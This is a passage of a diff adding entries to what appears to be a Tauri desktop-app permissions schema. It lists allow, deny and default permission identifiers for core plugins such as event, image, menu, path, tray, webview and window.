"const": "core:app:deny-version", + "markdownDescription": "Denies the version command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-listen`\n- `allow-unlisten`\n- `allow-emit`\n- `allow-emit-to`", + "type": "string", + "const": "core:event:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-listen`\n- `allow-unlisten`\n- `allow-emit`\n- `allow-emit-to`" + }, + { + "description": "Enables the emit command without any pre-configured scope.", + "type": "string", + "const": "core:event:allow-emit", + "markdownDescription": "Enables the emit command without any pre-configured scope." + }, + { + "description": "Enables the emit_to command without any pre-configured scope.", + "type": "string", + "const": "core:event:allow-emit-to", + "markdownDescription": "Enables the emit_to command without any pre-configured scope." + }, + { + "description": "Enables the listen command without any pre-configured scope.", + "type": "string", + "const": "core:event:allow-listen", + "markdownDescription": "Enables the listen command without any pre-configured scope." + }, + { + "description": "Enables the unlisten command without any pre-configured scope.", + "type": "string", + "const": "core:event:allow-unlisten", + "markdownDescription": "Enables the unlisten command without any pre-configured scope." + }, + { + "description": "Denies the emit command without any pre-configured scope.", + "type": "string", + "const": "core:event:deny-emit", + "markdownDescription": "Denies the emit command without any pre-configured scope." + }, + { + "description": "Denies the emit_to command without any pre-configured scope.", + "type": "string", + "const": "core:event:deny-emit-to", + "markdownDescription": "Denies the emit_to command without any pre-configured scope." + }, + { + "description": "Denies the listen command without any pre-configured scope.", + "type": "string", + "const": "core:event:deny-listen", + "markdownDescription": "Denies the listen command without any pre-configured scope." + }, + { + "description": "Denies the unlisten command without any pre-configured scope.", + "type": "string", + "const": "core:event:deny-unlisten", + "markdownDescription": "Denies the unlisten command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-from-bytes`\n- `allow-from-path`\n- `allow-rgba`\n- `allow-size`", + "type": "string", + "const": "core:image:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-from-bytes`\n- `allow-from-path`\n- `allow-rgba`\n- `allow-size`" + }, + { + "description": "Enables the from_bytes command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-from-bytes", + "markdownDescription": "Enables the from_bytes command without any pre-configured scope." + }, + { + "description": "Enables the from_path command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-from-path", + "markdownDescription": "Enables the from_path command without any pre-configured scope." + }, + { + "description": "Enables the new command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-new", + "markdownDescription": "Enables the new command without any pre-configured scope." + }, + { + "description": "Enables the rgba command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-rgba", + "markdownDescription": "Enables the rgba command without any pre-configured scope." + }, + { + "description": "Enables the size command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-size", + "markdownDescription": "Enables the size command without any pre-configured scope." + }, + { + "description": "Denies the from_bytes command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-from-bytes", + "markdownDescription": "Denies the from_bytes command without any pre-configured scope." + }, + { + "description": "Denies the from_path command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-from-path", + "markdownDescription": "Denies the from_path command without any pre-configured scope." + }, + { + "description": "Denies the new command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-new", + "markdownDescription": "Denies the new command without any pre-configured scope." + }, + { + "description": "Denies the rgba command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-rgba", + "markdownDescription": "Denies the rgba command without any pre-configured scope." + }, + { + "description": "Denies the size command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-size", + "markdownDescription": "Denies the size command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-append`\n- `allow-prepend`\n- `allow-insert`\n- `allow-remove`\n- `allow-remove-at`\n- `allow-items`\n- `allow-get`\n- `allow-popup`\n- `allow-create-default`\n- `allow-set-as-app-menu`\n- `allow-set-as-window-menu`\n- `allow-text`\n- `allow-set-text`\n- `allow-is-enabled`\n- `allow-set-enabled`\n- `allow-set-accelerator`\n- `allow-set-as-windows-menu-for-nsapp`\n- `allow-set-as-help-menu-for-nsapp`\n- `allow-is-checked`\n- `allow-set-checked`\n- `allow-set-icon`", + "type": "string", + "const": "core:menu:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-append`\n- `allow-prepend`\n- `allow-insert`\n- `allow-remove`\n- `allow-remove-at`\n- `allow-items`\n- `allow-get`\n- `allow-popup`\n- `allow-create-default`\n- `allow-set-as-app-menu`\n- `allow-set-as-window-menu`\n- `allow-text`\n- `allow-set-text`\n- `allow-is-enabled`\n- `allow-set-enabled`\n- `allow-set-accelerator`\n- `allow-set-as-windows-menu-for-nsapp`\n- `allow-set-as-help-menu-for-nsapp`\n- `allow-is-checked`\n- `allow-set-checked`\n- `allow-set-icon`" + }, + { + "description": "Enables the append command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-append", + "markdownDescription": "Enables the append command without any pre-configured scope." + }, + { + "description": "Enables the create_default command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-create-default", + "markdownDescription": "Enables the create_default command without any pre-configured scope." + }, + { + "description": "Enables the get command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-get", + "markdownDescription": "Enables the get command without any pre-configured scope." + }, + { + "description": "Enables the insert command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-insert", + "markdownDescription": "Enables the insert command without any pre-configured scope." + }, + { + "description": "Enables the is_checked command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-is-checked", + "markdownDescription": "Enables the is_checked command without any pre-configured scope." + }, + { + "description": "Enables the is_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-is-enabled", + "markdownDescription": "Enables the is_enabled command without any pre-configured scope." + }, + { + "description": "Enables the items command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-items", + "markdownDescription": "Enables the items command without any pre-configured scope." + }, + { + "description": "Enables the new command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-new", + "markdownDescription": "Enables the new command without any pre-configured scope." + }, + { + "description": "Enables the popup command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-popup", + "markdownDescription": "Enables the popup command without any pre-configured scope." + }, + { + "description": "Enables the prepend command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-prepend", + "markdownDescription": "Enables the prepend command without any pre-configured scope." + }, + { + "description": "Enables the remove command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-remove", + "markdownDescription": "Enables the remove command without any pre-configured scope." + }, + { + "description": "Enables the remove_at command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-remove-at", + "markdownDescription": "Enables the remove_at command without any pre-configured scope." + }, + { + "description": "Enables the set_accelerator command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-accelerator", + "markdownDescription": "Enables the set_accelerator command without any pre-configured scope." + }, + { + "description": "Enables the set_as_app_menu command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-as-app-menu", + "markdownDescription": "Enables the set_as_app_menu command without any pre-configured scope." + }, + { + "description": "Enables the set_as_help_menu_for_nsapp command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-as-help-menu-for-nsapp", + "markdownDescription": "Enables the set_as_help_menu_for_nsapp command without any pre-configured scope." + }, + { + "description": "Enables the set_as_window_menu command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-as-window-menu", + "markdownDescription": "Enables the set_as_window_menu command without any pre-configured scope." + }, + { + "description": "Enables the set_as_windows_menu_for_nsapp command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-as-windows-menu-for-nsapp", + "markdownDescription": "Enables the set_as_windows_menu_for_nsapp command without any pre-configured scope." + }, + { + "description": "Enables the set_checked command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-checked", + "markdownDescription": "Enables the set_checked command without any pre-configured scope." + }, + { + "description": "Enables the set_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-enabled", + "markdownDescription": "Enables the set_enabled command without any pre-configured scope." + }, + { + "description": "Enables the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-icon", + "markdownDescription": "Enables the set_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_text command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-text", + "markdownDescription": "Enables the set_text command without any pre-configured scope." + }, + { + "description": "Enables the text command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-text", + "markdownDescription": "Enables the text command without any pre-configured scope." + }, + { + "description": "Denies the append command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-append", + "markdownDescription": "Denies the append command without any pre-configured scope." + }, + { + "description": "Denies the create_default command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-create-default", + "markdownDescription": "Denies the create_default command without any pre-configured scope." + }, + { + "description": "Denies the get command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-get", + "markdownDescription": "Denies the get command without any pre-configured scope." + }, + { + "description": "Denies the insert command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-insert", + "markdownDescription": "Denies the insert command without any pre-configured scope." + }, + { + "description": "Denies the is_checked command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-is-checked", + "markdownDescription": "Denies the is_checked command without any pre-configured scope." + }, + { + "description": "Denies the is_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-is-enabled", + "markdownDescription": "Denies the is_enabled command without any pre-configured scope." + }, + { + "description": "Denies the items command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-items", + "markdownDescription": "Denies the items command without any pre-configured scope." + }, + { + "description": "Denies the new command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-new", + "markdownDescription": "Denies the new command without any pre-configured scope." + }, + { + "description": "Denies the popup command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-popup", + "markdownDescription": "Denies the popup command without any pre-configured scope." + }, + { + "description": "Denies the prepend command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-prepend", + "markdownDescription": "Denies the prepend command without any pre-configured scope." + }, + { + "description": "Denies the remove command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-remove", + "markdownDescription": "Denies the remove command without any pre-configured scope." + }, + { + "description": "Denies the remove_at command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-remove-at", + "markdownDescription": "Denies the remove_at command without any pre-configured scope." + }, + { + "description": "Denies the set_accelerator command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-accelerator", + "markdownDescription": "Denies the set_accelerator command without any pre-configured scope." + }, + { + "description": "Denies the set_as_app_menu command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-as-app-menu", + "markdownDescription": "Denies the set_as_app_menu command without any pre-configured scope." + }, + { + "description": "Denies the set_as_help_menu_for_nsapp command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-as-help-menu-for-nsapp", + "markdownDescription": "Denies the set_as_help_menu_for_nsapp command without any pre-configured scope." + }, + { + "description": "Denies the set_as_window_menu command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-as-window-menu", + "markdownDescription": "Denies the set_as_window_menu command without any pre-configured scope." + }, + { + "description": "Denies the set_as_windows_menu_for_nsapp command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-as-windows-menu-for-nsapp", + "markdownDescription": "Denies the set_as_windows_menu_for_nsapp command without any pre-configured scope." + }, + { + "description": "Denies the set_checked command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-checked", + "markdownDescription": "Denies the set_checked command without any pre-configured scope." + }, + { + "description": "Denies the set_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-enabled", + "markdownDescription": "Denies the set_enabled command without any pre-configured scope." + }, + { + "description": "Denies the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-icon", + "markdownDescription": "Denies the set_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_text command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-text", + "markdownDescription": "Denies the set_text command without any pre-configured scope." + }, + { + "description": "Denies the text command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-text", + "markdownDescription": "Denies the text command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-resolve-directory`\n- `allow-resolve`\n- `allow-normalize`\n- `allow-join`\n- `allow-dirname`\n- `allow-extname`\n- `allow-basename`\n- `allow-is-absolute`", + "type": "string", + "const": "core:path:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-resolve-directory`\n- `allow-resolve`\n- `allow-normalize`\n- `allow-join`\n- `allow-dirname`\n- `allow-extname`\n- `allow-basename`\n- `allow-is-absolute`" + }, + { + "description": "Enables the basename command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-basename", + "markdownDescription": "Enables the basename command without any pre-configured scope." + }, + { + "description": "Enables the dirname command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-dirname", + "markdownDescription": "Enables the dirname command without any pre-configured scope." + }, + { + "description": "Enables the extname command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-extname", + "markdownDescription": "Enables the extname command without any pre-configured scope." + }, + { + "description": "Enables the is_absolute command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-is-absolute", + "markdownDescription": "Enables the is_absolute command without any pre-configured scope." + }, + { + "description": "Enables the join command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-join", + "markdownDescription": "Enables the join command without any pre-configured scope." + }, + { + "description": "Enables the normalize command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-normalize", + "markdownDescription": "Enables the normalize command without any pre-configured scope." + }, + { + "description": "Enables the resolve command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-resolve", + "markdownDescription": "Enables the resolve command without any pre-configured scope." + }, + { + "description": "Enables the resolve_directory command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-resolve-directory", + "markdownDescription": "Enables the resolve_directory command without any pre-configured scope." + }, + { + "description": "Denies the basename command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-basename", + "markdownDescription": "Denies the basename command without any pre-configured scope." + }, + { + "description": "Denies the dirname command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-dirname", + "markdownDescription": "Denies the dirname command without any pre-configured scope." + }, + { + "description": "Denies the extname command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-extname", + "markdownDescription": "Denies the extname command without any pre-configured scope." + }, + { + "description": "Denies the is_absolute command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-is-absolute", + "markdownDescription": "Denies the is_absolute command without any pre-configured scope." + }, + { + "description": "Denies the join command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-join", + "markdownDescription": "Denies the join command without any pre-configured scope." + }, + { + "description": "Denies the normalize command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-normalize", + "markdownDescription": "Denies the normalize command without any pre-configured scope." + }, + { + "description": "Denies the resolve command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-resolve", + "markdownDescription": "Denies the resolve command without any pre-configured scope." + }, + { + "description": "Denies the resolve_directory command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-resolve-directory", + "markdownDescription": "Denies the resolve_directory command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-close`", + "type": "string", + "const": "core:resources:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-close`" + }, + { + "description": "Enables the close command without any pre-configured scope.", + "type": "string", + "const": "core:resources:allow-close", + "markdownDescription": "Enables the close command without any pre-configured scope." + }, + { + "description": "Denies the close command without any pre-configured scope.", + "type": "string", + "const": "core:resources:deny-close", + "markdownDescription": "Denies the close command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-get-by-id`\n- `allow-remove-by-id`\n- `allow-set-icon`\n- `allow-set-menu`\n- `allow-set-tooltip`\n- `allow-set-title`\n- `allow-set-visible`\n- `allow-set-temp-dir-path`\n- `allow-set-icon-as-template`\n- `allow-set-icon-with-as-template`\n- `allow-set-show-menu-on-left-click`", + "type": "string", + "const": "core:tray:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-get-by-id`\n- `allow-remove-by-id`\n- `allow-set-icon`\n- `allow-set-menu`\n- `allow-set-tooltip`\n- `allow-set-title`\n- `allow-set-visible`\n- `allow-set-temp-dir-path`\n- `allow-set-icon-as-template`\n- `allow-set-icon-with-as-template`\n- `allow-set-show-menu-on-left-click`" + }, + { + "description": "Enables the get_by_id command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-get-by-id", + "markdownDescription": "Enables the get_by_id command without any pre-configured scope." + }, + { + "description": "Enables the new command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-new", + "markdownDescription": "Enables the new command without any pre-configured scope." + }, + { + "description": "Enables the remove_by_id command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-remove-by-id", + "markdownDescription": "Enables the remove_by_id command without any pre-configured scope." + }, + { + "description": "Enables the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-icon", + "markdownDescription": "Enables the set_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_icon_as_template command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-icon-as-template", + "markdownDescription": "Enables the set_icon_as_template command without any pre-configured scope." + }, + { + "description": "Enables the set_icon_with_as_template command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-icon-with-as-template", + "markdownDescription": "Enables the set_icon_with_as_template command without any pre-configured scope." + }, + { + "description": "Enables the set_menu command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-menu", + "markdownDescription": "Enables the set_menu command without any pre-configured scope." + }, + { + "description": "Enables the set_show_menu_on_left_click command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-show-menu-on-left-click", + "markdownDescription": "Enables the set_show_menu_on_left_click command without any pre-configured scope." + }, + { + "description": "Enables the set_temp_dir_path command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-temp-dir-path", + "markdownDescription": "Enables the set_temp_dir_path command without any pre-configured scope." + }, + { + "description": "Enables the set_title command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-title", + "markdownDescription": "Enables the set_title command without any pre-configured scope." + }, + { + "description": "Enables the set_tooltip command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-tooltip", + "markdownDescription": "Enables the set_tooltip command without any pre-configured scope." + }, + { + "description": "Enables the set_visible command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-visible", + "markdownDescription": "Enables the set_visible command without any pre-configured scope." + }, + { + "description": "Denies the get_by_id command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-get-by-id", + "markdownDescription": "Denies the get_by_id command without any pre-configured scope." + }, + { + "description": "Denies the new command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-new", + "markdownDescription": "Denies the new command without any pre-configured scope." + }, + { + "description": "Denies the remove_by_id command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-remove-by-id", + "markdownDescription": "Denies the remove_by_id command without any pre-configured scope." + }, + { + "description": "Denies the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-icon", + "markdownDescription": "Denies the set_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_icon_as_template command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-icon-as-template", + "markdownDescription": "Denies the set_icon_as_template command without any pre-configured scope." + }, + { + "description": "Denies the set_icon_with_as_template command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-icon-with-as-template", + "markdownDescription": "Denies the set_icon_with_as_template command without any pre-configured scope." + }, + { + "description": "Denies the set_menu command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-menu", + "markdownDescription": "Denies the set_menu command without any pre-configured scope." + }, + { + "description": "Denies the set_show_menu_on_left_click command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-show-menu-on-left-click", + "markdownDescription": "Denies the set_show_menu_on_left_click command without any pre-configured scope." + }, + { + "description": "Denies the set_temp_dir_path command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-temp-dir-path", + "markdownDescription": "Denies the set_temp_dir_path command without any pre-configured scope." + }, + { + "description": "Denies the set_title command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-title", + "markdownDescription": "Denies the set_title command without any pre-configured scope." + }, + { + "description": "Denies the set_tooltip command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-tooltip", + "markdownDescription": "Denies the set_tooltip command without any pre-configured scope." + }, + { + "description": "Denies the set_visible command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-visible", + "markdownDescription": "Denies the set_visible command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-get-all-webviews`\n- `allow-webview-position`\n- `allow-webview-size`\n- `allow-internal-toggle-devtools`", + "type": "string", + "const": "core:webview:default", + "markdownDescription": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-get-all-webviews`\n- `allow-webview-position`\n- `allow-webview-size`\n- `allow-internal-toggle-devtools`" + }, + { + "description": "Enables the clear_all_browsing_data command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-clear-all-browsing-data", + "markdownDescription": "Enables the clear_all_browsing_data command without any pre-configured scope." + }, + { + "description": "Enables the create_webview command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-create-webview", + "markdownDescription": "Enables the create_webview command without any pre-configured scope." + }, + { + "description": "Enables the create_webview_window command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-create-webview-window", + "markdownDescription": "Enables the create_webview_window command without any pre-configured scope." + }, + { + "description": "Enables the get_all_webviews command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-get-all-webviews", + "markdownDescription": "Enables the get_all_webviews command without any pre-configured scope." + }, + { + "description": "Enables the internal_toggle_devtools command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-internal-toggle-devtools", + "markdownDescription": "Enables the internal_toggle_devtools command without any pre-configured scope." + }, + { + "description": "Enables the print command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-print", + "markdownDescription": "Enables the print command without any pre-configured scope." + }, + { + "description": "Enables the reparent command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-reparent", + "markdownDescription": "Enables the reparent command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_auto_resize command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-auto-resize", + "markdownDescription": "Enables the set_webview_auto_resize command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_background_color command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-background-color", + "markdownDescription": "Enables the set_webview_background_color command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_focus command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-focus", + "markdownDescription": "Enables the set_webview_focus command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_position command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-position", + "markdownDescription": "Enables the set_webview_position command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_size command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-size", + "markdownDescription": "Enables the set_webview_size command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_zoom command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-zoom", + "markdownDescription": "Enables the set_webview_zoom command without any pre-configured scope." + }, + { + "description": "Enables the webview_close command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-close", + "markdownDescription": "Enables the webview_close command without any pre-configured scope." + }, + { + "description": "Enables the webview_hide command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-hide", + "markdownDescription": "Enables the webview_hide command without any pre-configured scope." + }, + { + "description": "Enables the webview_position command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-position", + "markdownDescription": "Enables the webview_position command without any pre-configured scope." + }, + { + "description": "Enables the webview_show command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-show", + "markdownDescription": "Enables the webview_show command without any pre-configured scope." + }, + { + "description": "Enables the webview_size command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-size", + "markdownDescription": "Enables the webview_size command without any pre-configured scope." + }, + { + "description": "Denies the clear_all_browsing_data command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-clear-all-browsing-data", + "markdownDescription": "Denies the clear_all_browsing_data command without any pre-configured scope." + }, + { + "description": "Denies the create_webview command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-create-webview", + "markdownDescription": "Denies the create_webview command without any pre-configured scope." + }, + { + "description": "Denies the create_webview_window command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-create-webview-window", + "markdownDescription": "Denies the create_webview_window command without any pre-configured scope." + }, + { + "description": "Denies the get_all_webviews command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-get-all-webviews", + "markdownDescription": "Denies the get_all_webviews command without any pre-configured scope." + }, + { + "description": "Denies the internal_toggle_devtools command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-internal-toggle-devtools", + "markdownDescription": "Denies the internal_toggle_devtools command without any pre-configured scope." + }, + { + "description": "Denies the print command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-print", + "markdownDescription": "Denies the print command without any pre-configured scope." + }, + { + "description": "Denies the reparent command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-reparent", + "markdownDescription": "Denies the reparent command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_auto_resize command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-auto-resize", + "markdownDescription": "Denies the set_webview_auto_resize command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_background_color command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-background-color", + "markdownDescription": "Denies the set_webview_background_color command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_focus command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-focus", + "markdownDescription": "Denies the set_webview_focus command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_position command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-position", + "markdownDescription": "Denies the set_webview_position command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_size command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-size", + "markdownDescription": "Denies the set_webview_size command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_zoom command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-zoom", + "markdownDescription": "Denies the set_webview_zoom command without any pre-configured scope." + }, + { + "description": "Denies the webview_close command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-close", + "markdownDescription": "Denies the webview_close command without any pre-configured scope." + }, + { + "description": "Denies the webview_hide command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-hide", + "markdownDescription": "Denies the webview_hide command without any pre-configured scope." + }, + { + "description": "Denies the webview_position command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-position", + "markdownDescription": "Denies the webview_position command without any pre-configured scope." + }, + { + "description": "Denies the webview_show command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-show", + "markdownDescription": "Denies the webview_show command without any pre-configured scope." + }, + { + "description": "Denies the webview_size command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-size", + "markdownDescription": "Denies the webview_size command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-get-all-windows`\n- `allow-scale-factor`\n- `allow-inner-position`\n- `allow-outer-position`\n- `allow-inner-size`\n- `allow-outer-size`\n- `allow-is-fullscreen`\n- `allow-is-minimized`\n- `allow-is-maximized`\n- `allow-is-focused`\n- `allow-is-decorated`\n- `allow-is-resizable`\n- `allow-is-maximizable`\n- `allow-is-minimizable`\n- `allow-is-closable`\n- `allow-is-visible`\n- `allow-is-enabled`\n- `allow-title`\n- `allow-current-monitor`\n- `allow-primary-monitor`\n- `allow-monitor-from-point`\n- `allow-available-monitors`\n- `allow-cursor-position`\n- `allow-theme`\n- `allow-is-always-on-top`\n- `allow-activity-name`\n- `allow-scene-identifier`\n- `allow-internal-toggle-maximize`", + "type": "string", + "const": "core:window:default", + "markdownDescription": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-get-all-windows`\n- `allow-scale-factor`\n- `allow-inner-position`\n- `allow-outer-position`\n- `allow-inner-size`\n- `allow-outer-size`\n- `allow-is-fullscreen`\n- `allow-is-minimized`\n- `allow-is-maximized`\n- `allow-is-focused`\n- `allow-is-decorated`\n- `allow-is-resizable`\n- `allow-is-maximizable`\n- `allow-is-minimizable`\n- `allow-is-closable`\n- `allow-is-visible`\n- `allow-is-enabled`\n- `allow-title`\n- `allow-current-monitor`\n- `allow-primary-monitor`\n- `allow-monitor-from-point`\n- `allow-available-monitors`\n- `allow-cursor-position`\n- `allow-theme`\n- `allow-is-always-on-top`\n- `allow-activity-name`\n- `allow-scene-identifier`\n- `allow-internal-toggle-maximize`" + }, + { + "description": 